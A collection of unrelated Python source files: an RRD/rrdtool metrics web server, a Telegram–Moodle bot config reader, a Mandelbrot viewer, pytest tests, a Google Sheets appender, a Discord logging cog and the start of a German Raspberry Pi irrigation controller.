'DEF:total=%%(rrdpath)s/penelope/%s_metadata_invalidation\:count.rrd:sum:AVERAGE' % index_type,
'DEF:remote=%%(rrdpath)s/penelope/%s_metadata_invalidation_cmd_rx\:count.rrd:sum:AVERAGE' % index_type,
'AREA:total#66FF00:invalidations total/min\\l',
'AREA:remote#6600FF:invalidations from remote command/min\\l',
]
RRD_GRAPH_TITLE['penelope-%s-metadata-invalidation' % index_type] = '%%(host)s | %s metadata invalidation' % index_type
RRD_GRAPH_TYPES.append(('penelope-%s-metadata-invalidation' % index_type, 'Penelope %s metadata invalidation' % index_type))
# information about the frequency and duration about maybeSplit decisions
RRD_GRAPH_DEFS['penelope-%s-maybe-split' % index_type] = [
'DEF:total=%%(rrdpath)s/penelope/%s_maybe_split\:count.rrd:sum:AVERAGE' % index_type,
'DEF:expensive=%%(rrdpath)s/penelope/%s_maybe_split_expensive\:count.rrd:sum:AVERAGE' % index_type,
'AREA:total#66FF00:maybeSplit total/min\\l',
'AREA:expensive#6600FF:maybeSplit expensive/min\\l',
]
RRD_GRAPH_TITLE['penelope-%s-maybe-split' % index_type] = '%%(host)s | %s maybeSplit' % index_type
RRD_GRAPH_TYPES.append(('penelope-%s-maybe-split' % index_type, 'Penelope %s maybeSplit' % index_type))
RRD_GRAPH_DEFS['penelope-%s-maybe-split-fetch-duration' % index_type] = [
'DEF:min=%%(rrdpath)s/penelope/%s_maybe_split_fetch_duration\:min.rrd:sum:AVERAGE' % index_type,
'DEF:mean=%%(rrdpath)s/penelope/%s_maybe_split_fetch_duration\:mean.rrd:sum:AVERAGE' % index_type,
'DEF:max=%%(rrdpath)s/penelope/%s_maybe_split_fetch_duration\:max.rrd:sum:AVERAGE' % index_type,
'LINE:mean#66FF00:maybeSplit fetch mean ms\\l',
'LINE:max#FF0000:maybeSplit fetch max ms\\l',
]
RRD_GRAPH_TITLE['penelope-%s-maybe-split-fetch-duration' % index_type] = '%%(host)s | %s feature count fetch duration' % index_type
RRD_GRAPH_TYPES.append(('penelope-%s-maybe-split-fetch-duration' % index_type, 'Penelope %s feature count fetch duration' % index_type))
# guava caches
RRD_GRAPH_DEFS['penelope-%s-metadata-cache-rates' % index_type] = [
'DEF:hitrate=%%(rrdpath)s/penelope/%s_metadatacache_hit_rate\:mean.rrd:sum:AVERAGE' % index_type,
'DEF:missrate=%%(rrdpath)s/penelope/%s_metadatacache_miss_rate\:mean.rrd:sum:AVERAGE' % index_type,
'AREA:hitrate#66FF00:hits\\l',
'AREA:missrate#FF0000:misses\\l:STACK',
]
RRD_GRAPH_TITLE['penelope-%s-metadata-cache-rates' % index_type] = '%%(host)s | %s metadata cache performance' % index_type
RRD_GRAPH_TYPES.append(('penelope-%s-metadata-cache-rates' % index_type, 'Penelope %s metadata cache performance' % index_type))
RRD_GRAPH_DEFS['penelope-%s-metadata-cache-evictions' % index_type] = [
'DEF:evictions=%%(rrdpath)s/penelope/%s_metadatacache_evictions\:mean.rrd:sum:AVERAGE' % index_type,
'LINE:evictions#FF5555:evictions\\l',
]
RRD_GRAPH_TITLE['penelope-%s-metadata-cache-evictions' % index_type] = '%%(host)s | %s metadata cache evictions' % index_type
RRD_GRAPH_TYPES.append(('penelope-%s-metadata-cache-evictions' % index_type, 'Penelope %s metadata cache evictions' % index_type))
# database tombstone info
RRD_GRAPH_DEFS['penelope-database-columns-fetched'] = [
'DEF:colsmean=%(rrdpath)s/penelope/database_columns\:mean.rrd:sum:AVERAGE',
'DEF:colsmax=%(rrdpath)s/penelope/database_columns\:max.rrd:sum:AVERAGE',
'DEF:tombstonesmean=%(rrdpath)s/penelope/database_tombstones\:mean.rrd:sum:AVERAGE',
'DEF:tombstonesmax=%(rrdpath)s/penelope/database_tombstones\:max.rrd:sum:AVERAGE',
'AREA:colsmean#00FFAA:mean columns fetched\\l',
'AREA:tombstonesmean#FF5555:mean tombstones fetched\\l',
'LINE:tombstonesmax#FF0000:max tombstones fetched\\l',
]
RRD_GRAPH_TITLE['penelope-database-columns-fetched'] = '%(host)s | columns fetched'
RRD_GRAPH_TYPES.append(('penelope-database-columns-fetched', 'Penelope columns fetched'))
# metadata invalidation info
RRD_GRAPH_DEFS['penelope-metadata-remote-commands-serviced'] = [
'DEF:total=%(rrdpath)s/penelope/metadata_remote_commands_serviced\:count.rrd:sum:AVERAGE',
'AREA:total#6600FF:remote reads serviced/min\\l',
]
RRD_GRAPH_TITLE['penelope-metadata-remote-commands-serviced'] = '%(host)s | metadata remote reads serviced'
RRD_GRAPH_TYPES.append(('penelope-metadata-remote-commands-serviced', 'Penelope metadata remote reads serviced'))
# cassandra connection stats
RRD_GRAPH_DEFS['cassandra-connections-open'] = [
'DEF:conns=%(rrdpath)s/cassandra_connection/connections.open.rrd:sum:AVERAGE',
'AREA:conns#0066FF:connections open\\l',
]
RRD_GRAPH_TITLE['cassandra-connections-open'] = '%(host)s | open cassandra connections'
RRD_GRAPH_TYPES.append(('cassandra-connections-open', 'Cassandra open connections'))
queues_list = {}
path = RRDPATH % {
'host': '*',
'service': 'rabbitmq',
'metric': '*',
}
for filename in glob(path):
filename = os.path.basename(filename)
k = filename.rsplit('.', 1)[0]
if k.endswith('_unack') or k.endswith('_rate'):
continue
queues_list[k] = None
queues_list = queues_list.keys()
for queue in queues_list:
RRD_GRAPH_DEFS['rabbitmq-%s' % queue] = [
'DEF:size=%%(rrdpath)s/rabbitmq/%s.rrd:sum:AVERAGE' % queue,
'DEF:unack=%%(rrdpath)s/rabbitmq/%s_unack.rrd:sum:AVERAGE' % queue,
'LINE:size#FF6600:%s queue size\\l' % queue,
'LINE:unack#FF0000:%s unacknowledged\\l' % queue,
]
RRD_GRAPH_TITLE['rabbitmq-%s' % queue] = '%%(host)s | %s queue size' % queue
RRD_GRAPH_TYPES.append(('rabbitmq-%s' % queue, queue))
rabbitmq_rate_graph = 'rabbitmq-rates-%s' % queue
RRD_GRAPH_DEFS[rabbitmq_rate_graph] = [
'DEF:deliver=%%(rrdpath)s/rabbitmq/%s_deliver_rate.rrd:sum:AVERAGE' % queue,
'DEF:ack=%%(rrdpath)s/rabbitmq/%s_ack_rate.rrd:sum:AVERAGE' % queue,
'DEF:publish=%%(rrdpath)s/rabbitmq/%s_publish_rate.rrd:sum:AVERAGE' % queue,
'LINE2:deliver#fcff00:%s delivered/s\\l:dashes=5,10' % queue,
'LINE:ack#4EFF4D:%s acknowledged/s\\l' % queue,
'LINE:publish#FF3484:%s published/s\\l:dashes=10,5' % queue,
]
RRD_GRAPH_TITLE[rabbitmq_rate_graph] = '%%(host)s | %s queue rates' % queue
RRD_GRAPH_TYPES.append((rabbitmq_rate_graph, '%s rates' % queue))
path = RRDPATH % {
'host': '*',
'service': 'ebs',
'metric': '*',
}
ebs_mounts = {}
for filename in glob(path):
filename = os.path.basename(filename)
k = filename.split('_', 1)[0]
if not k in ebs_mounts:
ebs_mounts[k] = True
ebs_mounts = ebs_mounts.keys()
for mount in ebs_mounts:
RRD_GRAPH_DEFS['ebs-%s-ops' % mount] = [
'DEF:reads=%%(rrdpath)s/ebs/%s_read_ops.rrd:sum:AVERAGE' % mount,
'DEF:writes=%%(rrdpath)s/ebs/%s_write_ops.rrd:sum:AVERAGE' % mount,
'LINE:reads#FF6600:max reads/sec\\l',
'LINE:writes#00FF66:max writes/sec\\l',
]
RRD_GRAPH_DEFS['ebs-%s-queue' % mount] = [
'DEF:queue=%%(rrdpath)s/ebs/%s_queue_length.rrd:sum:AVERAGE' % mount,
'LINE:queue#66FFFF:Queued operations\\l',
]
RRD_GRAPH_TITLE['ebs-%s-ops' % mount] = '%%(host)s | %s ebs iops' % mount
RRD_GRAPH_TITLE['ebs-%s-queue' % mount] = '%%(host)s | %s ebs queue' % mount
RRD_GRAPH_TYPES.append(('ebs-%s-ops' % mount, '%s ebs iops' % mount))
RRD_GRAPH_TYPES.append(('ebs-%s-queue' % mount, '%s ebs queue' % mount))
path = RRDPATH % {
'host': '*',
'service': 'monit',
'metric': '*',
}
services = {}
for filename in glob(path):
filename = os.path.basename(filename)
monitservice = filename.split('_', 1)[0]
services[monitservice] = None
for monitservice in services.keys():
RRD_GRAPH_DEFS['monit-%s-cpu' % monitservice] = [
'DEF:cpu=%%(rrdpath)s/monit/%s_cpu.rrd:sum:AVERAGE' % monitservice,
#'CDEF:cpu_pct=cpu,100,*',
'LINE:cpu#FF00FF:%s CPU\\l' % monitservice,
]
RRD_GRAPH_DEFS['monit-%s-memory' % monitservice] = [
'DEF:memory=%%(rrdpath)s/monit/%s_memory.rrd:sum:AVERAGE' % monitservice,
'CDEF:memory_bytes=memory,1024,*',
'LINE:memory_bytes#00FF00:%s memory\\l' % monitservice,
]
RRD_GRAPH_TITLE['monit-%s-cpu' % monitservice] = '%%(host)s | %s CPU' % monitservice
RRD_GRAPH_TITLE['monit-%s-memory' % monitservice] = '%%(host)s | %s memory' % monitservice
RRD_GRAPH_TYPES.append(('monit-%s-cpu' % monitservice, '%s CPU' % monitservice))
RRD_GRAPH_TYPES.append(('monit-%s-memory' % monitservice, '%s Memory' % monitservice))
RRD_GRAPH_OPTIONS['monit-%s-cpu' % monitservice] = ['--upper-limit', '100.0']
#path = RRDPATH % {
# 'host': '*',
# 'service': 'haproxy',
# 'metric': '*',
#}
#hosts = []
#for filename in glob(path):
# hostname = filename.split('/')[-1].split('_', 1)[0]
# if not hostname in hosts:
# hosts.append(hostname)
#
#RRD_GRAPH_DEFS['haproxy-sessions'] = []
#for host in hosts:
# RRD_GRAPH_DEFS['haproxy-sessions'] += [
# 'DEF:%s_total=%%(rrdpath)s/haproxy/%s_stot.rrd' % (host, host),
# 'LINE:%s_total#66FFFF:%s total sessions\\l' % (host, host),
# ]
#RRD_GRAPH_TITLE['haproxy-sessions'] = '%%(host)s | haproxy sessions'
#RRD_GRAPH_TYPES.append(('haproxy-sessions', 'Sessions'))
for disk in ('raid0', 'sda1'):
RRD_GRAPH_DEFS['disk-%s-iops' % disk] = [
'DEF:reads=%%(rrdpath)s/disk/%s.reads.rrd:sum:AVERAGE' % disk,
'DEF:writes=%%(rrdpath)s/disk/%s.writes.rrd:sum:AVERAGE' % disk,
'LINE:reads#33CCCC:reads/s\\l',
'LINE:writes#CC3300:writes/s\\l',
]
RRD_GRAPH_DEFS['disk-%s-bytes' % disk] = [
'DEF:read=%%(rrdpath)s/disk/%s.bytes_read.rrd:sum:AVERAGE' % disk,
'DEF:written=%%(rrdpath)s/disk/%s.bytes_written.rrd:sum:AVERAGE' % disk,
'LINE:read#55FFFF:bytes read\\l',
'LINE:written#FF5500:bytes written\\l',
]
RRD_GRAPH_DEFS['disk-%s-space' % disk] = [
'DEF:used=%%(rrdpath)s/disk/%s.used_space.rrd:sum:AVERAGE' % disk,
'DEF:used=%%(rrdpath)s/disk/%s.free_space.rrd:sum:AVERAGE' % disk,
'LINE:used#660099:GBs used\\l',
'LINE:free#4499ff:GBs free\\l',
]
RRD_GRAPH_TITLE['disk-%s-iops' % disk] = '%%(host)s | %s iops' % disk
RRD_GRAPH_TITLE['disk-%s-bytes' % disk] = '%%(host)s | %s bytes/sec' % disk
RRD_GRAPH_TITLE['disk-%s-space' % disk] = '%%(host)s | %s GBs' % disk
RRD_GRAPH_TYPES.append(('disk-%s-iops' % disk, '%s iops' % disk))
RRD_GRAPH_TYPES.append(('disk-%s-bytes' % disk, '%s bytes' % disk))
RRD_GRAPH_TYPES.append(('disk-%s-space' % disk, '%s GBs' % disk))
def get_clusto_name(instanceid):
key = 'clusto/hostname/%s' % instanceid
c = cache.get(key)
if c:
return c
try:
server = clusto.get(instanceid)
hostname = server[0].attr_value(key='system', subkey='hostname')
cache.set(key, hostname, 300)
return hostname
except:
cache.set(key, instanceid, 300)
return instanceid
def dumps(obj):
callback = bottle.request.params.get('callback', None)
result = json.dumps(obj, indent=2)
if callback:
bottle.response.content_type = 'text/javascript'
result = '%s(%s)' % (callback, result)
else:
bottle.response.content_type = 'application/json'
return result
def rrdtool(args):
p = subprocess.Popen(['rrdtool'] + args.split(' '))
p.wait()
def create_rrd(filename, metric, data):
print 'Creating rrd', filename, metric, data
try:
os.makedirs(os.path.dirname(filename))
except:
pass
rrdtool_args = {
'filename': filename,
'start': (data['ts'] - 61),
'dstype': data['type'],
}
if data['type'] == 'DERIVE':
rrdtool_args['min'] = '0'
else:
rrdtool_args['min'] = 'U'
rrdtool('create %(filename)s --start %(start)s --step 60 \
DS:sum:%(dstype)s:600:%(min)s:U \
RRA:AVERAGE:0.5:1:1500 \
RRA:AVERAGE:0.5:5:2304 \
RRA:AVERAGE:0.5:30:4320' % rrdtool_args)
def update_rrd(filename, metric, data):
#filename = filename.split('/var/lib/metartg/rrds/', 1)[1]
#rrdtool('update --daemon 127.0.0.1:42217 %s %s:%s' % (filename, str(data['ts']), str(data['value'])))
#ts = data['ts'] - (data['ts'] % 60)
rrdtool('update %s %s:%s' % (filename, str(data['ts']), str(data['value'])))
def update_redis(host, service, metricname, metric):
db.sadd('hosts', host)
db.hset('metrics/%s' % host, '%s/%s' % (service, metricname), json.dumps((metric['ts'], metric['value'])))
def process_rrd_update(host, service, body):
metrics = json.loads(body)
for metric in metrics:
rrdfile = RRDPATH % {
'host': host,
'service': service,
'metric': metric,
}
rrdfullpath = '/var/lib/metartg/rrds/' + rrdfile
if not os.path.exists(rrdfullpath):
create_rrd(rrdfullpath, metric, metrics[metric])
update_rrd(rrdfile, metric, metrics[metric])
update_redis(host, service, metric, metrics[metric])
return
def rrdupdate_worker(queue):
while True:
#sys.stdout.write('.')
#sys.stdout.flush()
metric = queue.get()
if metric:
process_rrd_update(*metric)
#procs = []
#for i in range(2):
# procs.append(eventlet.spawn_n(rrdupdate_worker, rrdqueue))
#procs = []
#for i in range(4):
# proc = multiprocessing.Process(target=rrdupdate_worker, args=(update_queue,))
# proc.start()
# procs.append(proc)
@bottle.get('/status')
def status():
return dumps({
'rrdqueue': rrdqueue.qsize(),
})
@bottle.post('/rrd/:host/:service')
def post_rrd_update(host, service):
rrdqueue.put((host, service, bottle.request.body.read()))
#eventlet.spawn_n(process_rrd_update, host, service, bottle.request.body.read())
bottle.response.status = 202
return
def cassandra_scores_graphdef(host):
r = []
colors = ['FF6600', 'CC3333', '00FF00', 'FFCC00', 'DA4725', '66CC66', '6EA100', '0000FF', 'EACC00', 'D8ACE0', '4668E4', '35962B', '8D00BA']
files = glob('%s/cassandra_scores/*.rrd' % host)
files.sort()
for i, filename in enumerate(files):
peer = filename.rsplit('/', 1)[1]
name = peer.rsplit('.', 1)[0]
name = name.replace('.', '-')
r += [
'DEF:%s=%s:sum:AVERAGE' % (name, filename),
'LINE:%s#%s:%s score\\l' % (name, colors[i % len(colors)], name),
]
return r
@bottle.get('/graph/:host/:graphtype')
def get_rrd_graph(host, graphtype):
now = int(time())
params = bottle.request.params
start = params.get('start', (now - 3600))
end = params.get('end', now)
size = params.get('size', 'large')
cmd = ['/usr/bin/rrdtool', 'graph',
'-',
'--daemon', '127.0.0.1:42217',
'--font', 'DEFAULT:7:monospace',
'--font-render-mode', 'normal',
'--color', 'MGRID#880000',
'--color', 'GRID#777777',
'--color', 'CANVAS#000000',
'--color', 'FONT#ffffff',
'--color', 'BACK#444444',
'--color', 'SHADEA#000000',
'--color', 'SHADEB#000000',
'--color', 'FRAME#444444',
'--color', 'ARROW#FFFFFF',
'--imgformat', 'PNG',
'--tabwidth', '75',
'--start', str(start),
'--end', str(end),
]
cmd += RRD_GRAPH_OPTIONS.get(graphtype, [])
cmd += ['--title', RRD_GRAPH_TITLE.get(graphtype, host) % {
'host': get_clusto_name(host),
}]
if size == 'small':
cmd += [
#'--no-legend',
'--width', '375',
'--height', '100'
]
else:
cmd += [
'--width', '600',
'--height', '200',
'--watermark', 'simplegeo'
]
if graphtype == 'cassandra-scores':
if size == 'small':
cmd.append('--no-legend')
cmd += cassandra_scores_graphdef(host)
if size == 'large':
if graphtype in RRD_LGRAPH_DEFS:
DEFS = RRD_LGRAPH_DEFS.get(graphtype, [])
else:
DEFS = RRD_GRAPH_DEFS.get(graphtype, [])
else:
DEFS = RRD_GRAPH_DEFS.get(graphtype, [])
for gdef in DEFS:
cmd.append(gdef % {
'rrdpath': '%s' % host,
})
#print '\n'.join(cmd)
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, env={'TZ': 'PST8PDT'})
stdout, stderr = proc.communicate()
bottle.response.content_type = 'image/png'
return stdout
@bottle.get('/search')
def search():
p = bottle.request.params
query = p.get('q', None)
if not query:
bottle.abort(400, 'Parameter "q" is required')
pools = query.replace('+', ' ').replace(',', ' ').split(' ')
pools.sort()
cachekey = 'search/%s' % ','.join(pools)
result = cache.get(cachekey)
if result:
return dumps(json.loads(result))
def get_contents(name):
obj = clusto.get_by_name(name)
return set(obj.contents())
pools = list(gpool.imap(get_contents, pools))
first = pools[0]
pools = pools[1:]
result = []
servers = gpool.imap(lambda x: (x, x.attrs()), first.intersection(*pools))
def get_server_info(server):
return {
'name': server.name,
'parents': [x.name for x in server.parents()],
'contents': [x.name for x in server.contents()],
'ip': server.attr_values(key='ip', subkey='ipstring'),
'dnsname': server.attr_values(key='ec2', subkey='public-dns'),
}
servers = list(gpool.imap(get_server_info, first.intersection(*pools)))
servers.sort(key=lambda x: x['name'])
cache.set(cachekey, json.dumps(servers), 300)
return dumps(servers)
@bottle.get('/static/:filename')
def serve_static(filename):
return bottle.static_file(filename, root=STATIC_PATH)
@bottle.get('/')
def index():
template = env.get_template('metrics.html')
groups = {}
for name, human_name in RRD_GRAPH_TYPES:
group, metric = name.split('-', 1)
if not group in groups:
groups[group] = {}
groups[group][metric] = human_name
result = []
for group in groups:
graphs = groups[group]
graphs = graphs.items()
graphs.sort()
result.append((group, graphs))
result.sort()
return template.render(groups=result)
if __name__ == '__main__':
bottle.run()
|
from os import getenv
# TELEGRAM
OWNER = int(getenv('OWNER'))
if OWNER is None:
raise Exception("Por favor configura tu Telegram User ID")
API_ID = int(getenv('API_ID'))
if API_ID is None:
raise Exception("Por favor configura el API_ID del Bot")
API_HASH = getenv('API_HASH')
if API_HASH is None:
raise Exception("Por favor configura el API_HASH del Bot")
TELEGRAM_TOKEN = getenv('TELEGRAM_TOKEN')
if TELEGRAM_TOKEN is None:
raise Exception("Por favor configura el TOKEN del Bot")
# DATOS DEL MOODLE
HOST = getenv('HOST')
if HOST is None:
raise Exception("Por favor configura la URL del Moodle")
ACCOUNT = getenv('ACCOUNT')
if ACCOUNT is None:
raise Exception("Por favor configura tu nombre de usuario del Moodle")
PASSWORD = getenv('PASSWORD')
if PASSWORD is None:
raise Exception("Por favor configura tu contraseña del Moodle")
# CUENTA DE MEGA
PASS_MEGA = getenv('PASS_MEGA')
if PASS_MEGA is None:
raise Exception("Por favor configura tu contraseña de GMAIL")
GMAIL_MEGA = getenv('GMAIL_MEGA')
if GMAIL_MEGA is None:
raise Exception("Por favor configura tu correo de GMAIL")
# ARCHIVOS
MEGABYTES = int(getenv('MEGABYTES'))
if MEGABYTES is None:
raise Exception("Por favor configura los MEGABYTES a los que se dividirán los archivos") |
import cv2
import numpy as np
from numpy import complex, array
import colorsys
ITERATIONS = 1000
SIZE = 700 # Image size
# Convert from number of iterations to RGB
def getColour(i):
color = (0.4, 0.4, i*10/255.0)
return color
# function defining a mandelbrot
def mandelbrot(x, y, iterations = ITERATIONS):
c0 = complex(x, y)
c = 0
for i in range(1, iterations):
if abs(c) > 2:
return getColour(i)
c = c * c + c0
return (0.4, 0.4, ITERATIONS/255.0)
# creating the new image in RGB mode
def mandelSet(frameCount):
pixels = np.zeros((SIZE,SIZE,3))
for x in range(SIZE):
# displaying the progress as percentage
# print("%.2f %%" % (x / SIZE * 100.0))
for y in range(SIZE):
pixels[y, x] = mandelbrot((x - (0.75 * SIZE)) / (SIZE / 2),
(y - (0.5 * SIZE)) / (SIZE / 2), frameCount)
return pixels
# to display the created fractal after
# completing the given number of iterations
def getFrame():
print('Frame: ' + str(getFrame.count))
# Create data on first call only
if getFrame.count/(SIZE*SIZE) < 1:
getFrame.z = mandelSet(getFrame.count)
# Just roll data for subsequent calls
getFrame.count +=1
return getFrame.z
getFrame.count = 0
getFrame.z = None
while True:
# Get a numpy array to display from the simulation
npimage = getFrame()
cv2.imshow('image', npimage)
cv2.waitKey(1)
|
import shutil
import pytest
from mason.api.get import get
from mason.api.apply import apply
from mason.definitions import from_root
from mason.test.support import testing_base as base
from os import path, mkdir
class TestGetConfiguration:
def test_config_exists(self):
env = base.get_env("/test/support/", "/test/support/validations/")
response, status = get("config", '5', env=env)
expects = [{'current': False,
'execution_client': [],
'id': '5',
'metastore_client': [{'name': 'test'}],
'scheduler_client': [],
'storage_client': []}]
assert(response['Configs'] == expects)
assert(status == 200)
def test_config_malformed(self):
env = base.get_env("/test/support/", "/test/support/validations/")
base.set_log_level()
response, status = get("config", "0", log_level="fatal", env=env)
assert(response['Errors'][0][0:18] == "Malformed resource")
assert(status == 400)
def test_config_dne(self):
env = base.get_env("/test/support/", "/test/support/validations/")
base.set_log_level()
response, status = get("config", 'monkeys', log_level="fatal", env=env)
expects = {'Errors': ['No config matching monkeys. Register new resources with \'mason apply\'']}
assert(response == expects)
assert(status == 404)
class TestApplyConfig:
@pytest.fixture(autouse=True)
def run_around_tests(self):
tmp_folder = from_root("/.tmp/")
if not path.exists(tmp_folder):
mkdir(tmp_folder)
yield
if path.exists(tmp_folder):
shutil.rmtree(tmp_folder)
def test_good_configs(self):
env = base.get_env("/.tmp/", "/test/support/validations/")
response, status = apply(from_root("/test/support/"), env=env, log_level="fatal")
assert(len(response["Info"]) == 20)
assert(len(response["Errors"]) == 8)
assert(status == 200)
response, status = get("config", env=env, log_level="fatal")
assert(len(response["Configs"]) == 4)
def test_overwrite(self):
pass
|
from datetime import datetime
from os import environ
from json import loads
from authlib.client import AssertionSession
import gspread
"""
gspread:
https://youtu.be/vISRn5qFrkM
https://github.com/burnash/gspread
https://developers.google.com/sheets/api/reference/rest/v4/ValueInputOption
oauth issues:
https://github.com/google/oauth2client/issues/735
https://www.reddit.com/r/learnpython/comments/8elu5a/google_sheets_api_dilemma_googleauth_and_gspread/
https://github.com/burnash/gspread/issues/529
oauth solution:
https://www.reddit.com/r/Python/comments/8kzra5/how_to_use_gspread_without_oauth2client/?st=JHG7OFKZ&sh=051ca8af
https://blog.authlib.org/2018/authlib-for-gspread
"""
def create_assertion_session(scopes, subject=None):
# with open(conf_file, 'r') as f:
# conf = json.load(f)
conf = loads(environ['GOOGLE_CLIENT_SECRET'])
token_url = conf['token_uri']
issuer = conf['client_email']
key = conf['private_key']
key_id = conf.get('private_key_id')
header = {'alg': 'RS256'}
if key_id:
header['kid'] = key_id
# Google puts scope in payload
claims = {'scope': ' '.join(scopes)}
return AssertionSession(
grant_type=AssertionSession.JWT_BEARER_GRANT_TYPE,
token_url=token_url,
issuer=issuer,
audience=token_url,
claims=claims,
subject=subject,
key=key,
header=header,
)
def append_google_sheet(profile_dict, msg):
scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
session = create_assertion_session(scope)
client = gspread.Client(None, session)
sheet = client.open(environ['GOOGLE_SHEET_NAME']).sheet1
# content = sheet.get_all_values()
# print(content)
now = datetime.now()
row = [str(now), profile_dict['display_name'], profile_dict['picture_url'], profile_dict['status_message'], profile_dict['user_id'], msg]
sheet.append_row(values=row, value_input_option='USER_ENTERED')
if __name__ == '__main__':
profile_dict = {
'display_name': 'test_name',
'picture_url': 'https://www.google.com',
'status_message': 'testing',
'user_id': '123'
}
append_google_sheet(profile_dict, 'apple')
|
import string
from dataclasses import dataclass
from multiprocessing import Queue
from random import getrandbits, randrange
@dataclass
class RawMsg:
msg_id: int
destination: int
msg: string
class Supervisor:
def __init__(self, msg_count, node_count):
self.task_list = []
self.response_queue = Queue()
self.unique_sequence = self.unique_id()
self.queue_list = []
self.msg_count = msg_count
self.node_count = node_count
self.netModules = dict()
@staticmethod
def unique_id():
seed = getrandbits(8)
while True:
yield seed
seed += 1
def generate_task(self, port, tasks, new_node = True):
for i in range(self.msg_count):
msg = RawMsg(0, 0, "")
msg.destination = self.generate_dest_port(port)
msg.msg = f'Hi from {port} to {msg.destination}, have a nice day: {i}'
msg.msg_id = next(self.unique_sequence)
self.task_list.append(msg.msg_id)
tasks.put(msg)
if new_node:
self.queue_list.append([port, tasks])
def generate_dest_port(self, port, base_port=5000):
dest = base_port + randrange(self.node_count)
while dest == port:
dest = base_port + randrange(self.node_count)
return dest
def get_results(self):
msg_delivered = 0
for i in range(self.response_queue.qsize()):
msg_id = self.response_queue.get()
if msg_id in self.task_list:
msg_delivered = msg_delivered + 1
print(f'Msg delivered: {msg_delivered} / {len(self.task_list)} ')
def generate_new_tasks(self):
for q in self.queue_list:
self.generate_task(q[0], q[1], False)
|
import math
def shell():
print("This piece of software shows Pi to a user definded decimal. (max 15)")
while True:
print('>>> ', end='')
entry = input()
if entry == "quit" or entry == "q":
break
if not entry.isdigit():
print("Thats not a Number. Please try again")
else:
if int(entry) <= 15:
print(str(math.pi)[0:int(entry)+2])
else:
print(math.pi, "| 15 is the max of after decimals")
if __name__ == '__main__':
shell()
|
"""
MIT License
Copyright (c) 2020 GamingGeek
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from discord.ext import commands
import functools
import traceback
import datetime
import discord
import aiohttp
import json
class CommandCompletion(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.watchedcmds = ['purge']
@commands.Cog.listener()
async def on_command_completion(self, ctx):
if ctx.command.name in self.watchedcmds:
if ctx.guild:
logch = self.bot.configs[ctx.guild.id].get('log.action')
if logch:
embed = discord.Embed(color=ctx.author.color, timestamp=datetime.datetime.utcnow(), description=f'`{ctx.command.name}` **was used in** {ctx.channel.mention} **by {ctx.author.name}**')
embed.set_author(name=ctx.author, icon_url=str(ctx.author.avatar_url_as(static_format='png', size=2048)))
embed.add_field(name='Message', value=ctx.message.system_content, inline=False)
embed.set_footer(text=f"Author ID: {ctx.author.id} | Channel ID: {ctx.channel.id}")
if ctx.command.name == 'purge':
purged = None
reason = 'No Reason Provided'
try:
purged = self.bot.recentpurge[ctx.channel.id]
reason = self.bot.recentpurge.get(f'{ctx.channel.id}-reason', 'No Reason Provided')
self.bot.recentpurge[f'{ctx.channel.id}-reason'] = None
embed.add_field(name='Reason', value=reason, inline=False)
embed.set_field_at(0, name='Message', value=ctx.message.system_content.replace(f'--reason {reason}', ''), inline=False)
except KeyError as e:
pass
if purged:
try:
embed.add_field(
name='Purged Messages',
value=(await self.bot.haste(json.dumps(self.bot.recentpurge[ctx.channel.id], indent=4))),
inline=False
)
except Exception:
embed.add_field(name='Purged Messages', value='Failed to upload messages to hastebin', inline=False)
try:
await logch.send(embed=embed)
except Exception:
pass
def setup(bot):
try:
bot.add_cog(CommandCompletion(bot))
bot.logger.info(f'$GREENLoaded event $CYANCommandCompletion!')
except Exception as e:
# errortb = ''.join(traceback.format_exception(type(e), e, e.__traceback__))
bot.logger.error(f'$REDError while adding event $CYAN"CommandCompletion"', exc_info=e)
|
# -*- coding: utf-8 -*-
"""
Zentrales Skript für die Bewässerungssteuerung mit den Funktionen
main()
bewaesserungsablauf()
shutdown()
main() führt Initialisierungen durch und entscheidet ob der normale Bewässerungsablauf ausgeführt werden soll oder in den Wartungsmodus verzweigt wird
Der bewaesserungsablauf() führt die Messungen durch und speichert die Werte in der JSON-Datenstruktur. Dann prüft er ob die Voraussetzungen für eine Bewässerung vorliegen und startet ggf. die Bewässerungsroutine. Schließlich wird noch die JSON-Datenstruktur sowie die Konfigurationsdatei gespeichert und der nächste Startzeitpunkt bestimmt und in die RTC geschrieben
shutdown() setzt den Alarmausgang SQW der Realtime Clock zurück (damit beginnt die Entladung des Kondensators, was zum Abschalten der Versorgungsspannung führt) und startet den Shutdown des Raspi
"""
import time
import datetime as dt
import logging
import os
import sys
import subprocess as sp
from RPi import GPIO
import rtc_tools as rt
import reservoir as res
import bewaesserung_lib as lib
import bewaesserung_rlib as rlib
MIN_DELAY_SHUTDOWN = 5
ZIELLEVEL = 2 # Ziellevel für Befüllung des Reservoirs
MOBILER_HOTSPOT = "MOBSPOT"
# Logger initialisieren
logger = logging.getLogger()
logger.setLevel(logging.INFO)
fH = logging.FileHandler("/home/pi/bewaesserung.log")
fH.setLevel(logging.INFO)
cH = logging.StreamHandler()
cH.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fH.setFormatter(formatter)
cH.setFormatter(formatter)
logger.addHandler(fH)
logger.addHandler(cH)
#################################################################################################################################################
def shutdown():
"""
Setzt den Alarmausgang SQW der Realtime Clock zurück (damit beginnt die Entladung des Kondensators, was zum Abschalten der Versorgungsspannung führt) und startet den Shutdown des Raspi
Parameter
keine
"""
GPIO.cleanup()
logger.info("Shutdown beginnt")
